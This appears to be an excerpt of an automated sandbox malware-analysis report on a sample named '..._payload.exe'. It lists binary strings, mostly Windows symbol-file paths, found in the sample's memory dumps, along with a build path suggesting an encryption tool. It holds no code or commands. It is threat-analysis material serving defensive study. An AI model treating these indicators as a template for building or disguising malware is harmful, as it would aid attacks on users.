3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2037446933.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Gc source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316633831.000000000395D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314963868.0000000003950000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316109364.000000000395A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314653770.000000000394E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359865944.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361850146.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\: source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353832982.00000000038FB000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314907836.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315942860.00000000038F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367136260.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000331B000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2368122855.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361063125.000000000331B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297833112.0000000003309000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\b source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\N,tAM source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ Z0@g source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ult\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\j source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\o source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046565289.0000000003327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\*\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275071344.0000000003303000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275036397.0000000003300000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275912662.0000000003304000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*z source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361547114.000000000397A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353656586.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354799442.0000000003965000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2361373053.0000000003968000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251806523.000000000333D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ow\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\n source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\*i source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353921532.00000000038DE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354889761.00000000038E5000.00000004.00000020.00020000.00000000.sdmp
